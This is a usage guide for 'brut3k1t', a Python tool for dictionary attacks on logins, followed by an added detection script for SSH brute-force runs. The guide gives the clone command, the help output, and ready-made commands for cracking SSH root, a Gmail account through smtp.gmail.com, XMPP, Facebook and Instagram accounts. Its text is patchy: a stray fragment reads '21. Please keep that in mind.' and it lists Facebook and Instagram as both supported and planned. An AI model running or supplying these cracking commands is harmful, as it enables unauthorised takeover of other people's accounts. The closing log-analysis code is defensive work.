brut3k1t is a server-side bruteforce module that supports dictionary attacks for several protocols. The protocols that are currently complete and supported are:
ssh, ftp, smtp, XMPP, instagram, facebook
There will be future implementations of different protocols and services (including Twitter, Facebook, Instagram).
Installation is simple. brut3k1t requires several dependencies, although they will be installed by the program if you do not have them.
Downloading is simple. Simply git clone:
git clone https://github.com/ex0dus-0x/brut3k1t
Change to directory:
Utilizing brut3k1t is a little more complicated than just running a Python file.
python brut3k1t.py -h shows the help menu:
usage: brut3k1t.py [-h] [-s SERVICE] [-u USERNAME] [-w PASSWORD] [-a ADDRESS] [-p PORT] [-d DELAY]

Server-side bruteforce module written in Python

optional arguments:
  -h, --help            show this help message and exit
  -a ADDRESS, --address ADDRESS
                        Provide host address for specified service. Required for certain protocols
  -p PORT, --port PORT  Provide port for host address for specified service. If not specified, will be automatically set
  -d DELAY, --delay DELAY
                        Provide the number of seconds the program delays as each password is tried

required arguments:
  -s SERVICE, --service SERVICE
                        Provide a service being attacked. Several protocols and services are supported
  -u USERNAME, --username USERNAME
                        Provide a valid username for service/protocol being executed
  -w PASSWORD, --wordlist PASSWORD
                        Provide a wordlist or directory to a wordlist
Cracking an SSH server running on 192.168.1.3 with username root, using wordlist.txt as a wordlist:
python brut3k1t.py -s ssh -a 192.168.1.3 -u root -w wordlist.txt
The program will automatically set the port to 22, but if it is different, specify it with the -p flag.
Cracking the email account firstname.lastname@example.org with wordlist.txt on port 25 with a 3 second delay. For email it is necessary to use the SMTP server’s address, e.g. for Gmail it is smtp.gmail.com. You can research this using Google.
python brut3k1t.py -s smtp -a smtp.gmail.com -u firstname.lastname@example.org -w wordlist.txt -p 25 -d 3
Cracking the XMPP account test with wordlist.txt on default port 5222. XMPP is similar to SMTP, in that you will need to provide the address of the XMPP server, in this case creep.im:
python brut3k1t.py -s xmpp -a creep.im -u test -w wordlist.txt
Cracking Facebook is quite a challenge, since you will require the target user ID, not the username.
python brut3k1t.py -s facebook -u 1234567890 -w wordlist.txt
Cracking Instagram with username test with wordlist wordlist.txt and a 5 second delay:
python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5
Without the -p flag, the default port for that service will be used. You do not need to provide it for Facebook and Instagram, since they are um… web-based. 🙂
Without the -d flag, the default delay in seconds will be 1.
Provide the server address with the -a flag, when cracking SMTP and XMPP, respectively.
If the wordlist is at /usr/local/wordlists/wordlist.txt, specify that for the wordlist.
21. Please keep that in mind.
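On the receiving end, a run like the SSH example above appears in the sshd auth log as repeated failed passwords for one username from one source, spaced by roughly the -d delay. The following is an added detection example, not part of brut3k1t; the log lines are constructed, and the function name and thresholds (min_failures, max_jitter) are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import pstdev

# OpenSSH "Failed password" line as it appears in auth.log / secure.
FAILED = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+"
)

def find_dictionary_runs(lines, min_failures=5, max_jitter=1.0, year=2024):
    """Return {(source, user): (failures, mean_gap_seconds)} for evenly paced runs.

    Syslog timestamps carry no year, so one is supplied (assumption).
    """
    stamps = defaultdict(list)
    for line in lines:
        m = FAILED.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            stamps[(m.group(3), m.group(2))].append(ts)
    flagged = {}
    for key, times in stamps.items():
        if len(times) < max(min_failures, 2):
            continue  # too few failures to call it a dictionary run
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # A tool sleeping a fixed delay produces near-constant gaps;
        # a person mistyping a password does not.
        if pstdev(gaps) <= max_jitter:
            flagged[key] = (len(times), sum(gaps) / len(gaps))
    return flagged

def _line(clock, user, src):
    return f"Mar 13 {clock} host sshd[2101]: Failed password for {user} from {src} port 50112 ssh2"

# Constructed sample: one paced run, one irregular series, one user typo.
SAMPLE_LOG = (
    [_line(f"10:15:{s:02d}", "root", "192.168.1.50") for s in (1, 4, 7, 10, 13, 16)]
    + [_line(c, "bob", "10.0.0.9")
       for c in ("10:20:05", "10:20:07", "10:20:47", "10:20:52", "10:22:52")]
    + [_line(c, "alice", "10.0.0.7") for c in ("10:30:00", "10:30:20")]
    + ["Mar 13 10:31:00 host sshd[2101]: Accepted password for alice from 10.0.0.7 port 50112 ssh2"]
)

if __name__ == "__main__":
    for (src, user), (count, gap) in find_dictionary_runs(SAMPLE_LOG).items():
        print(f"{src} -> {user}: {count} failures, about {gap:.1f}s apart")
```

Pairing a check like this with per-source rate limiting or lockout on the server shortens the window in which a wordlist can be worked through.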